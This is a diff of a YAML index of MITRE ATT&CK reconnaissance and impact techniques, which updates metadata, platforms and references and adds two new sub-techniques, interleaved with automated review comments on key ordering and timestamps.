PHISHING. Retrieved February 2, 2023.
@@ -56945,31 +57629,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56978,19 +57643,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
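Review bot: the substantive change to T1595.001 is small: a new contributor, `revoked: false` and `x_mitre_deprecated: false`, the added data source 'Network Traffic: Network Traffic Content', the version bump '1.0' to '1.1', and the spec version moving from 2.1.0 to 3.2.0. Because the generator also reordered the keys (`id`, `created`, `external_references` and `object_marking_refs` were deleted in the previous hunk and re-added here), the diff reads as a full rewrite; a stable key order in the emitter would make future index updates reviewable at a glance. The `id`, `created` and Botnet Scan reference values re-added here match the ones removed above.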
@@ -57048,7 +57735,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -57069,7 +57755,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57085,8 +57771,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -57112,7 +57796,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57128,8 +57812,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -57153,7 +57835,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57175,13 +57857,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -57273,13 +57953,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57288,7 +57967,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -57305,17 +57983,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
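Review bot: T1498.001 loses Azure AD, Office 365, SaaS and Google Workspace from `x_mitre_platforms`, leaving Windows, IaaS, Linux and macOS, with the version bump '1.3' to '1.4' matching that change. Any per-platform index files in this repository that still list T1498.001 under the removed platforms should be regenerated in the same change so the YAML and CSV indexes do not disagree. `x_mitre_modified_by_ref` is deleted here but re-added in the next hunk, so that removal is reordering only.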
@@ -57340,7 +58013,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -57378,7 +58052,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57412,12 +58086,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57482,42 +58154,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
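Review bot: both new sub-techniques, T1485.001 Lifecycle-Triggered Deletion and T1496.003 SMS Pumping, carry `x_mitre_detection: ''` and `atomic_tests: []`; an empty string rather than a missing key is fine as long as whatever renders the index handles it. The hunk also interleaves the deletion of T1499.003's old platform list and references with the two new entries; its `id` attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9, `created` date and the Cisco and Arbor references are re-added in the following hunks, so nothing is lost, but the platform list re-added below drops Azure AD, Office 365, SaaS and Google Workspace, which is the real change behind the version bump. For T1485.001 the sole data source is 'Cloud Storage: Cloud Storage Modification', so alerting on lifecycle configuration changes, especially on buckets holding cloud logs, covers both the availability impact and the Indicator Removal use the description mentions.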
@@ -57528,13 +58285,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
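Review bot: most of the churn in this hunk is key reordering rather than change: x_mitre_modified_by_ref is removed at this position and re-emitted further down the same T1499.003 object, so the substantive edits are only the bump to x_mitre_version '1.3' and the new x_mitre_deprecated, x_mitre_domains and x_mitre_platforms keys. Having the generator emit keys in a fixed order would keep future regenerations down to the lines that actually changed.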
@@ -57542,12 +58306,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
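Review bot: the modified timestamp for T1561 moves backward, from 2023-05-09 to 2023-04-20, which is the opposite of what a refresh from a newer ATT&CK bundle should produce; check whether the upstream object really was restated with an earlier date or whether the generator read a stale bundle for this technique. The additions for T1499.003 in the same hunk (`revoked: false`, the expanded external_references, `x_mitre_attack_spec_version: 3.2.0`) follow the pattern used for the other objects in this change.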
@@ -57608,109 +58393,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
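Review bot: the FireEye APT38 Oct 2018 reference URL changes from content.fireeye.com/apt/rpt-apt38 to the mandiant.com PDF; that follows upstream, but the same source_name is cited by T1565.003 later in this file, so confirm both entries carry the new URL after regeneration. Separately, the T1489 description appears to break the line after `MSExchangeIS`, with `, which will make Exchange content inaccessible` starting its own line, which looks like inline code markup being rendered as a newline in the diff view; confirm the double-quoted scalar in the committed YAML is intact and parses as one string.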
@@ -57719,10 +58474,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
